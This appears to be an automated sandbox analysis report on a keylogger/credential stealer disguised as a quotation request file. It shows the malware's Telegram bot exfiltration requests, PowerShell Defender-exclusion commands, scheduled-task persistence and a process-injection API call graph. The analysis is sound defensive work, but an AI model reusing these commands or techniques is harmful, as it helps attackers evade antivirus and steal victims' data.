                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WhB7aW%2BgDYHJdbi0oX0dAgw%2B1k9PsAnalJGoD6rITSZ162d8P29aLGQxLQS7jEcVEYqLwGj9mh7iXhgC%2F30yKVBwOY1SVktePvutFyXOtj%2B5XK2Db8RrKHeqiqsUJ76LtRqWWumG"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604ab7d93419b2-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1945&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1468074&cwnd=148&unsent_bytes=0&cid=2d67e2b52c029a4c&ts=459&x=0"
                                                                                                                      2024-11-21 11:20:41 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      17192.168.2.949821149.154.167.2204437264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:42 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2014:24:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-21 11:20:42 UTC344INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:42 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 55
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-11-21 11:20:42 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      18192.168.2.949828188.114.97.34437636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:43 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2024-11-21 11:20:44 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:44 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151953
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DgbC6VViAgQ8QiclbfojwO%2BjjoMsxuMARrQvN6cdIK4eM4%2Ban9T%2FLb3%2Fc%2Fx%2FadBXLAETn6J86kFfYgaULVSxpvQommGFXA9fSyZOpgQCqMe89O4ZKnT%2FHYdYCLp2wu6Ar5QhO8qJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604acb4d57c457-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1873&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1541710&cwnd=252&unsent_bytes=0&cid=e3c9e4983aa8c03c&ts=467&x=0"
                                                                                                                      2024-11-21 11:20:44 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      19192.168.2.949834149.154.167.2204437636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:45 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2011:49:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-21 11:20:46 UTC344INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:46 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 55
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-11-21 11:20:46 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Click to jump to process

                                                                                                                      Target ID:0
                                                                                                                      Start time:06:20:06
                                                                                                                      Start date:21/11/2024
                                                                                                                      Path:C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
                                                                                                                      Imagebase:0xbd0000
                                                                                                                      File size:1'017'856 bytes
                                                                                                                      MD5 hash:1AE7A890014EBA9C807C6ADEABAC7671
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:06:20:08
                                                                                                                      Start date:21/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
                                                                                                                      Imagebase:0xae0000
                                                                                                                      File size:433'152 bytes
                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:4
                                                                                                                      Start time:06:20:08
                                                                                                                      Start date:21/11/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:5
                                                                                                                      Start time:06:20:08
                                                                                                                      Start date:21/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
                                                                                                                      Imagebase:0xae0000
                                                                                                                      File size:433'152 bytes
                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:6
                                                                                                                      Start time:06:20:08
                                                                                                                      Start date:21/11/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:7
                                                                                                                      Start time:06:20:08
                                                                                                                      Start date:21/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"
                                                                                                                      Imagebase:0x7f0000
                                                                                                                      File size:187'904 bytes
                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:8
                                                                                                                      Start time:06:20:08
                                                                                                                      Start date:21/11/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:9
                                                                                                                      Start time:06:20:09
                                                                                                                      Start date:21/11/2024
                                                                                                                      Path:C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
                                                                                                                      Imagebase:0xd50000
                                                                                                                      File size:1'017'856 bytes
                                                                                                                      MD5 hash:1AE7A890014EBA9C807C6ADEABAC7671
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.3824755853.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3829829868.00000000031DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:10
                                                                                                                      Start time:06:20:11
                                                                                                                      Start date:21/11/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      Imagebase:0x9c0000
                                                                                                                      File size:1'017'856 bytes
                                                                                                                      MD5 hash:1AE7A890014EBA9C807C6ADEABAC7671
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 53%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:11
                                                                                                                      Start time:06:20:11
                                                                                                                      Start date:21/11/2024
                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                      Imagebase:0x7ff72d8c0000
                                                                                                                      File size:496'640 bytes
                                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:12
                                                                                                                      Start time:06:20:14
                                                                                                                      Start date:21/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp"
                                                                                                                      Imagebase:0x7f0000
                                                                                                                      File size:187'904 bytes
                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:13
                                                                                                                      Start time:06:20:14
                                                                                                                      Start date:21/11/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:14
                                                                                                                      Start time:06:20:14
                                                                                                                      Start date:21/11/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
                                                                                                                      Imagebase:0x4a0000
                                                                                                                      File size:1'017'856 bytes
                                                                                                                      MD5 hash:1AE7A890014EBA9C807C6ADEABAC7671
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Has exited:false

                                                                                                                      Target ID:18
                                                                                                                      Start time:06:21:56
                                                                                                                      Start date:21/11/2024
                                                                                                                      Path:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:wmiadap.exe /F /T /R
                                                                                                                      Imagebase:0x7ff765e30000
                                                                                                                      File size:182'272 bytes
                                                                                                                      MD5 hash:1BFFABBD200C850E6346820E92B915DC
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:12.4%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:0%
                                                                                                                        Total number of Nodes:212
                                                                                                                        Total number of Limit Nodes:11
                                                                                                                        execution_graph 23950 153d5f0 DuplicateHandle 23951 153d686 23950->23951 23952 153cfa0 23953 153cfe6 GetCurrentProcess 23952->23953 23955 153d031 23953->23955 23956 153d038 GetCurrentThread 23953->23956 23955->23956 23957 153d075 GetCurrentProcess 23956->23957 23958 153d06e 23956->23958 23959 153d0ab 23957->23959 23958->23957 23960 153d0d3 GetCurrentThreadId 23959->23960 23961 153d104 23960->23961 23962 74181b5 23964 7417f44 23962->23964 23963 741819f 23964->23963 23965 741ab40 12 API calls 23964->23965 23966 741aba6 12 API calls 23964->23966 23967 741ab38 12 API calls 23964->23967 23965->23963 23966->23963 23967->23963 23785 7417f84 23787 7417f44 23785->23787 23786 741802b 23787->23785 23787->23786 23791 741ab40 23787->23791 23805 741ab38 23787->23805 23820 741aba6 23787->23820 23792 741ab5a 23791->23792 23804 741ab62 23792->23804 23835 741afc1 23792->23835 23839 741b43a 23792->23839 23844 741b2a9 23792->23844 23849 741b349 23792->23849 23853 741b557 23792->23853 23857 741b057 23792->23857 23861 741b0f4 23792->23861 23866 741b1c5 23792->23866 23871 741b503 23792->23871 23876 741b450 23792->23876 23880 741b3b1 23792->23880 23804->23786 23806 741aac5 23805->23806 23807 741ab3e 23805->23807 23806->23786 23808 741afc1 2 API calls 23807->23808 23809 741b3b1 2 API calls 23807->23809 23810 741b450 2 API calls 23807->23810 23811 741b503 2 API calls 23807->23811 23812 741b1c5 2 API calls 23807->23812 23813 741b0f4 2 API calls 23807->23813 23814 741b057 2 API calls 23807->23814 23815 741b557 2 API calls 23807->23815 23816 741b349 2 API calls 23807->23816 23817 741b2a9 2 API calls 23807->23817 23818 741b43a 2 API calls 23807->23818 23819 741ab62 23807->23819 23808->23819 23809->23819 23810->23819 23811->23819 23812->23819 23813->23819 23814->23819 23815->23819 23816->23819 23817->23819 23818->23819 23819->23786 23821 741ab34 23820->23821 23823 741aba9 23820->23823 23822 741aac5 23821->23822 23824 741afc1 2 API calls 23821->23824 23825 741b3b1 2 API calls 23821->23825 23826 741b450 2 API calls 23821->23826 23827 741b503 2 API calls 23821->23827 23828 741b1c5 2 API calls 23821->23828 23829 741b0f4 2 API calls 23821->23829 23830 741b057 2 API calls 23821->23830 23831 741b557 2 API calls 23821->23831 23832 741b349 2 API calls 23821->23832 23833 741b2a9 2 API calls 23821->23833 23834 741b43a 2 API calls 23821->23834 23822->23786 23823->23786 23824->23822 23825->23822 23826->23822 23827->23822 23828->23822 23829->23822 23830->23822 23831->23822 23832->23822 23833->23822 23834->23822 23885 7417b28 23835->23885 23889 7417b1c 23835->23889 23840 741b50a 23839->23840 23893 74178a0 23840->23893 23897 7417898 23840->23897 23841 741b7a6 23845 741b2b7 23844->23845 23901 7416de0 23845->23901 23905 7416de8 23845->23905 23846 741b862 23909 741bd58 23849->23909 23914 741bd68 23849->23914 23850 741b361 23927 7417988 23853->23927 23931 7417990 23853->23931 23854 741b579 23859 74172d0 Wow64SetThreadContext 23857->23859 23860 74172c8 Wow64SetThreadContext 23857->23860 23858 741b043 23858->23804 23859->23858 23860->23858 23862 741b104 23861->23862 23864 7416de0 ResumeThread 23862->23864 23865 7416de8 ResumeThread 23862->23865 23863 741b862 23864->23863 23865->23863 23867 741b01c 23866->23867 23868 741b02e 23866->23868 23867->23866 23867->23868 23869 74178a0 WriteProcessMemory 23867->23869 23870 7417898 WriteProcessMemory 23867->23870 23868->23804 23869->23867 23870->23867 23872 741b509 23871->23872 23874 74178a0 WriteProcessMemory 23872->23874 23875 7417898 WriteProcessMemory 23872->23875 23873 741b7a6 23874->23873 23875->23873 23935 74177e0 23876->23935 23939 74177d8 23876->23939 23877 741b46e 23881 741b380 23880->23881 23881->23880 23882 741b247 23881->23882 23883 74178a0 WriteProcessMemory 23881->23883 23884 7417898 WriteProcessMemory 23881->23884 23883->23881 23884->23881 23886 7417bb1 CreateProcessA 23885->23886 23888 7417d73 23886->23888 23888->23888 23890 7417b28 CreateProcessA 23889->23890 23892 7417d73 23890->23892 23892->23892 23894 74178e8 WriteProcessMemory 23893->23894 23896 741793f 23894->23896 23896->23841 23898 74178a0 WriteProcessMemory 23897->23898 23900 741793f 23898->23900 23900->23841 23902 7416de8 ResumeThread 23901->23902 23904 7416e59 23902->23904 23904->23846 23906 7416e28 ResumeThread 23905->23906 23908 7416e59 23906->23908 23908->23846 23910 741bd7d 23909->23910 23919 74172d0 23910->23919 23923 74172c8 23910->23923 23911 741bd93 23911->23850 23915 741bd7d 23914->23915 23917 74172d0 Wow64SetThreadContext 23915->23917 23918 74172c8 Wow64SetThreadContext 23915->23918 23916 741bd93 23916->23850 23917->23916 23918->23916 23920 7417315 Wow64SetThreadContext 23919->23920 23922 741735d 23920->23922 23922->23911 23924 74172d0 Wow64SetThreadContext 23923->23924 23926 741735d 23924->23926 23926->23911 23928 7417990 ReadProcessMemory 23927->23928 23930 7417a1f 23928->23930 23930->23854 23932 74179db ReadProcessMemory 23931->23932 23934 7417a1f 23932->23934 23934->23854 23936 7417820 VirtualAllocEx 23935->23936 23938 741785d 23936->23938 23938->23877 23940 74177e0 VirtualAllocEx 23939->23940 23942 741785d 23940->23942 23942->23877 23943 741be98 23944 741c023 23943->23944 23946 741bebe 23943->23946 23946->23944 23947 7415fc0 23946->23947 23948 741c118 PostMessageW 23947->23948 23949 741c184 23948->23949 23949->23946 23968 1534668 23969 1534672 23968->23969 23973 1534758 23968->23973 23978 1533e34 23969->23978 23971 153468d 23974 153477d 23973->23974 23982 1534858 23974->23982 23986 1534868 23974->23986 23979 1533e3f 23978->23979 23994 1535c24 23979->23994 23981 1536faf 23981->23971 23984 153488f 23982->23984 23983 153496c 23983->23983 23984->23983 23990 15344b4 23984->23990 23988 153488f 23986->23988 23987 153496c 23988->23987 23989 15344b4 CreateActCtxA 23988->23989 23989->23987 23991 15358f8 CreateActCtxA 23990->23991 23993 15359bb 23991->23993 23995 1535c2f 23994->23995 23998 1535c44 23995->23998 23997 1537055 23997->23981 23999 1535c4f 23998->23999 24002 1535c74 23999->24002 24001 153713a 24001->23997 24003 1535c7f 24002->24003 24006 1535ca4 24003->24006 24005 153722d 24005->24001 24007 1535caf 24006->24007 24009 153852b 24007->24009 24013 153abda 24007->24013 24008 1538569 24008->24005 24009->24008 24017 153ccd7 24009->24017 24022 153ccc8 24009->24022 24027 153ac00 24013->24027 24032 153ac10 24013->24032 24014 153abee 24014->24009 24018 153ccf9 24017->24018 24019 153cd1d 24018->24019 24046 153ce77 24018->24046 24050 153ce88 24018->24050 24019->24008 24024 153ccde 24022->24024 24023 153cd1d 24023->24008 24024->24023 24025 153ce77 2 API calls 24024->24025 24026 153ce88 2 API calls 24024->24026 24025->24023 24026->24023 24028 153ac10 24027->24028 24036 153acf9 24028->24036 24041 153ad08 24028->24041 24029 153ac1f 24029->24014 24034 153acf9 GetModuleHandleW 24032->24034 24035 153ad08 GetModuleHandleW 24032->24035 24033 153ac1f 24033->24014 24034->24033 24035->24033 24037 153ad3c 24036->24037 24038 153ad19 24036->24038 24037->24029 24038->24037 24039 153af40 GetModuleHandleW 24038->24039 24040 153af6d 24039->24040 24040->24029 24042 153ad3c 24041->24042 24043 153ad19 24041->24043 24042->24029 24043->24042 24044 153af40 GetModuleHandleW 24043->24044 24045 153af6d 24044->24045 24045->24029 24048 153ce95 24046->24048 24047 153cecf 24047->24019 24048->24047 24054 153ba40 24048->24054 24051 153ce95 24050->24051 24052 153cecf 24051->24052 24053 153ba40 2 API calls 24051->24053 24052->24019 24053->24052 24055 153ba4b 24054->24055 24057 153dbe8 24055->24057 24058 153d23c 24055->24058 24059 153d247 24058->24059 24060 1535ca4 2 API calls 24059->24060 24061 153dc57 24060->24061 24061->24057
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ea10155737baf14d7db4284597a40315176c9bbc1ccdabfab195cb7e63979fa5
                                                                                                                        • Instruction ID: bd043526da493c2c2369379415a24dc180ba9ce99d714947e69313533c3ac42c
